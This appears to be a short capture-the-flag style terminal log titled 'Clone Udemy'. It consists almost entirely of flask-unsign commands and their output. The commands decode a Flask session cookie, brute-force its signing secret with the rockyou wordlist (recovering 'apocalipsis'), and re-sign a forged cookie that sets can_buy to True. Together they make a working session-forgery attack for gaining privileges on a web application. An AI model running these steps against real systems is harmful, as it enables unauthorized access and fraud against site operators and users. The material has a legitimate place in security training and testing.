Clone Udemy

$ flask-unsign --decode --cookie ".eJxVjkEKwzAMBL-i6mzyAP-g0EOvpYSgOIpjcGWw7EAI-XsMbSk9LbvMSrvjMEfShRXtc0coTVCrc6yKBh-pwkIrw8gsEJP3PEGqpcP-MF-cc065wVdZKYYJXOaJpQSK2sE9MilDyRuQpyB_zd-jW_JB4OPnGi8N6w06kmGsG9q5HWOD7wVDELQl1xZU5Sz0YrRYWAseJ-wkR1c.ZysU9g.H1uBMSs10UCtgIIxqJiQHNeIv04"
{'_flashes': [('success', 'You have been logged out.'), ('error', 'Invalid credentials. Please try again.'), ('success', 'Login successful!')], 'can_buy': False, 'logged_in': True, 'username': 'test'}

$ flask-unsign --unsign --wordlist "E:/Downloads/rockyou.txt" --no-literal-eval --cookie ".eJxVjkEKwzAMBL-i6mzyAP-g0EOvpYSgOIpjcGWw7EAI-XsMbSk9LbvMSrvjMEfShRXtc0coTVCrc6yKBh-pwkIrw8gsEJP3PEGqpcP-MF-cc065wVdZKYYJXOaJpQSK2sE9MilDyRuQpyB_zd-jW_JB4OPnGi8N6w06kmGsG9q5HWOD7wVDELQl1xZU5Sz0YrRYWAseJ-wkR1c.ZysU9g.H1uBMSs10UCtgIIxqJiQHNeIv04"
[*] Session decodes to: {'_flashes': [('success', 'You have been logged out.'), ('error', 'Invalid credentials. Please try again.'), ('success', 'Login successful!')], 'can_buy': False, 'logged_in': True, 'username': 'test'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 9216 attempts
b'apocalipsis'

flask-unsign --sign --secret 'apocalipsis' --cookie "{'_flashes': [('success', 'You have been logged out.'), ('error', 'Invalid credentials. Please try again.'), ('success', 'Login successful!')], 'can_buy': True, 'logged_in': True, 'username': 'test'}"
.eJxVjsEKgzAQRH9lu-fgB_gHhR56LUVkjWsMpBvYTQQR_71CK6WnYYY3zGzYT4lsZsP2uSGUQ9Cq92yGDh-5wkwLw8AskHIIPEKupcFudyfOqlkP-CoLpTiCVx5ZSqRkDdwTkzEUXYECRflr_oZuOUSBr59quhxY59CT9ENdsS1a2eHnQB_lDKqxCr0YWyxsBfc3p01HDA.ZysXQQ.Vh6mNaBnGjzhLnnfCPJZh8t95a0